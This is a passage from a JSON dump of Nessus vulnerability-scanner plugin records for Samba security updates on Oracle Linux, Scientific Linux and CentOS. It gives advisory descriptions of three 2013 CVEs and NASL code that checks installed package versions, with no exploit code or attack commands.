(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.", "edition": 22, "published": "2014-03-18T00:00:00", "title": "Oracle Linux 5 : samba (ELSA-2014-0305)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2014-03-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:samba-common", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:libsmbclient", "p-cpe:/a:oracle:linux:samba-client", "p-cpe:/a:oracle:linux:samba", "p-cpe:/a:oracle:linux:samba-swat", "p-cpe:/a:oracle:linux:libsmbclient-devel"], "id": "ORACLELINUX_ELSA-2014-0305.NASL", "href": "https://www.tenable.com/plugins/nessus/73070", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0305 and \n# Oracle Linux Security Advisory ELSA-2014-0305 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73070);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_bugtraq_id(57631, 61597);\n script_xref(name:\"RHSA\", value:\"2014:0305\");\n\n script_name(english:\"Oracle Linux 5 : samba (ELSA-2014-0305)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0305 :\n\nUpdated samba packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-March/004022.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"libsmbclient-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"libsmbclient-devel-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-client-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-common-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-swat-3.0.33-3.40.el5_10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:47:49", "description": "It was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nAfter installing this update, the smb service will be restarted\nautomatically.", "edition": 15, "published": "2013-10-11T00:00:00", "title": "Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20130930)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2013-10-11T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba3x-doc", "p-cpe:/a:fermilab:scientific_linux:libtalloc-devel", "p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind", "p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba3x-common", "p-cpe:/a:fermilab:scientific_linux:libtevent-devel", "p-cpe:/a:fermilab:scientific_linux:libtalloc-compat1", "p-cpe:/a:fermilab:scientific_linux:samba3x-swat", "p-cpe:/a:fermilab:scientific_linux:libtalloc", "p-cpe:/a:fermilab:scientific_linux:samba3x", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel", "p-cpe:/a:fermilab:scientific_linux:libtevent", "p-cpe:/a:fermilab:scientific_linux:samba3x-client"], "id": "SL_20130930_SAMBA3X_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/70390", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70390);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n\n script_name(english:\"Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20130930)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nAfter installing this update, the smb service will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1310&L=scientific-linux-errata&T=0&P=683\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bbd14410\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libtalloc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libtalloc-compat1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libtalloc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libtevent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libtevent-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"libtalloc-2.0.7-2.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libtalloc-compat1-2.0.7-2.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libtalloc-devel-2.0.7-2.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libtevent-0.9.18-2.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libtevent-devel-0.9.18-2.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-client-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-common-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-debuginfo-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-doc-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-domainjoin-gui-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-swat-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-devel-3.6.6-0.136.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtalloc / libtalloc-compat1 / libtalloc-devel / libtevent / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:29:06", "description": "Updated samba packages that fix three security issues, several bugs,\nand add one enhancement are now available for Red Hat Enterprise Linux\n6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5\nTechnical Notes, linked to in the References, for information on the\nmost significant of these changes.\n\nAll samba users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement. After installing this update, the smb service will be\nrestarted automatically.", "edition": 25, "published": "2014-11-12T00:00:00", "title": "CentOS 6 : samba (CESA-2013:1542)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2014-11-12T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba-swat", "p-cpe:/a:centos:centos:samba-domainjoin-gui", "p-cpe:/a:centos:centos:samba-winbind-krb5-locator", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba-winbind", "p-cpe:/a:centos:centos:samba-doc", "p-cpe:/a:centos:centos:samba-common", "p-cpe:/a:centos:centos:samba-winbind-clients", "p-cpe:/a:centos:centos:samba-client", "p-cpe:/a:centos:centos:samba", "p-cpe:/a:centos:centos:libsmbclient", "p-cpe:/a:centos:centos:libsmbclient-devel", "p-cpe:/a:centos:centos:samba-winbind-devel"], "id": "CENTOS_RHSA-2013-1542.NASL", "href": "https://www.tenable.com/plugins/nessus/79159", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1542 and \n# CentOS Errata and Security Advisory 2013:1542 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79159);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_bugtraq_id(57631, 61597);\n script_xref(name:\"RHSA\", value:\"2013:1542\");\n\n script_name(english:\"CentOS 6 : samba (CESA-2013:1542)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix three security issues, several bugs,\nand add one enhancement are now available for Red Hat Enterprise Linux\n6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5\nTechnical Notes, linked to in the References, for information on the\nmost significant of these changes.\n\nAll samba users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement. After installing this update, the smb service will be\nrestarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-November/001076.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4801e5a0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0213\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-devel-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-client-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-common-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-doc-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-domainjoin-gui-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-swat-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-clients-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-devel-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-krb5-locator-3.6.9-164.el6\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:13:04", "description": "Updated samba3x packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT 